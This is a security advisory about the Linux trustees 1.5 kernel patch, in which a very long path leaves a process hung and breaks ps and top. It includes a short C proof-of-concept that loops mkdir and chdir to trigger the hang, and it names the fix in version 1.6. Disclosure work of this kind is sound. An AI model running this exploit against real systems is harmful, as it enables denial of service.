COMMAND

    trustees

SYSTEMS AFFECTED

    linux trustees 1.5

PROBLEM

    Andrey E.  Lerman found  following.   Linux trustees  is a  kernel
    patch which provide Netware-like  permissions to linux. It  is not
    in kernel by default.  For more information see project's  website
    at:

        http://www.braysystems.com/linux/trustees.html

    When  accessing  a  file  or  directory  with a very long path the
    process  hangs  in  an  unkillable  state. All other processes are
    SEGFAULTing  when  trying  to  access  unkillable  process'  /proc
    entry.  So system utilities ps,  w, top, killall and the like  are
    stoppping working.  Except that, the system continues to  function
    normally.   The  only  version  tested  is  trustees 1.5 for linux
    2.2.14.  But it seems  what other versions of linux  trustees <1.6
    are vulnerable.

    Not sure  if this  vulnerability is  only local  DoS.   It may  be
    possible  to  overwrite  the  process'  structures  in the kernel,
    causing  privileges  elevation.   Servers  with  open ftp incoming
    directory, nfs or samba shares are at risk too.  Exploit:

    #include <stdio.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <fcntl.h>
    #include <unistd.h>
    
    int main(void)
    {
    
    while(1) {
	    if(mkdir("aaaa",0777)<0) {
		    perror("mkdir");
		    exit(1);
		    }
	    if(chdir("aaaa")<0) {
		    perror("chdir");
		    exit(1);
		    }
	    }
    
    return(0);
    }

SOLUTION

    The  only  solution  is  reboot.   This  problem is fixed in linux
    trustees 1.6, available for linux 2.2.14 and 2.3.99.